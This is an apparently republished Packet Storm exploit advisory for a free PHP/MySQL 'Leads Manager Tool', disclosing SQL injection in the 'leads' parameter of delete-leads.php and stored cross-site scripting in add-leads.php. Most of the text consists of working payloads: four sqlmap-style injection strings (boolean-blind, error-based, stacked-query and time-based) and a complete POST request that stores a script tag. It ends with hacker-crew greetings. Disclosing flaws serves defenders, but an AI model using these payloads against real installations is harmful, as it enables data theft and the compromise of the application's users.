Leads Manager Tool SQL Injection / Cross Site Scripting
2024-8-2 22:7:48 Author: packetstormsecurity.com(查看原文) 阅读量:0 收藏

[x]========================================================================================================================================[x]
| Title : Leads Manager Tool SQL & XSS[stored)] Vulnerabilities
| Software : Leads Manager Tool Using PHP and MySQL with Source Code
| Create By : https://www.sourcecodester.com/users/remyandrade
| First Release: 25/01/22
| Download : https://www.sourcecodester.com/php/17510/leads-manager-tool-using-php-and-mysql-source-code.html
| Date : 30 Agustus 2024
| Author : OoN_Boy
[x]========================================================================================================================================[x]
| Technology : PHP
| Database : MySQL
| Price : FREE
| Description : Leads Manager Tool, a comprehensive web application designed to streamline the process of managing business leads. Built with the power of PHP and MySQL, this tool offers a seamless and user-friendly experience for storing, updating, and organizing lead information
[x]========================================================================================================================================[x]

[O] Exploit

http://localhost/leads-manager-tool/endpoint/delete-leads.php?leads=[SQL]
http://localhost/leads-manager-tool/endpoint/add-leads.php

[O] Proof of concept

[SQL]
Parameter: leads (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: leads= --emurate' RLIKE (SELECT (CASE WHEN (8305=8305) THEN 0x202d2d656d7572617465 ELSE 0x28 END))-- rUwl

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: leads= --emurate' OR (SELECT 1382 FROM(SELECT COUNT(*),CONCAT(0x7162787171,(SELECT (ELT(1382=1382,1))),0x7176706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vKls

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: leads= --emurate';SELECT SLEEP(5)#

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: leads= --emurate' AND (SELECT 1244 FROM (SELECT(SLEEP(5)))fAev)-- ZNBt

[XSS]
POST /leads-manager-tool/endpoint/add-leads.php HTTP/1.1
Host: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/leads-manager-tool/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="126", "Chromium";v="126"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 85

leads_name=Vrs<script>alert(1)</script>Hck&[email protected]&phone_number=911-911-9111

[x]========================================================================================================================================[x]

[O] Greetz

BatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^

[x]========================================================================================================================================[x]


文章来源: https://packetstormsecurity.com/files/179888/leadsmt-sqlxss.txt
如有侵权请联系:admin#unsafe.sh